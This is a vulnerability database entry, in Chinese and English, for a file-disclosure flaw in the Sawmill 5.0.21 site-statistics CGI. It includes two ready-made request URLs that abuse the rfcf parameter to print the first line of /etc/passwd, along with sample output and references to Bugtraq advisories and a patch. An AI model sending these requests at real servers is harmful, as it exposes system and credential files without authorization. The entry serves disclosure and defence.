https://www.exploit-db.com/exploits/20041
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200006-100

SawMill5.0.21版本CGI程序存在漏洞。远程攻击者通过列表rfcf参数文件可以读取任意文件的第一行，那些文件的内容SawMill试图解析配置命令。

source: http://www.securityfocus.com/bid/1402/info

Sawmill is a site statistics package for Unix, Windows and Mac OS. A specially crafted request can disclose the first line of any world readable file for which the full pathname is known, for example /etc/passwd. The output of the request is similar to the following: 'Unknown configuration command "root:x:0:0:root:/root:/bin/sh" in "/etc/passwd".' 

The following request will display the first line of /etc/passwd

http://target:port/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3

If sawmill is run as a cgi script, the following can be used instead:

http://target/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1

来源:BUGTRAQ
名称:20000626sawmill5.0.21oldpathbug&weakhashalgorithm;
链接:http://archives.neohapsis.com/archives/bugtraq/2000-06/0271.html
来源:BID
名称:1402
链接:http://www.securityfocus.com/bid/1402
来源:BUGTRAQ
名称:20000706PatchforFlowerfireSawmillVulnerabilitiesAvailable
链接:http://archives.neohapsis.com/archives/bugtraq/2000-07/0080.html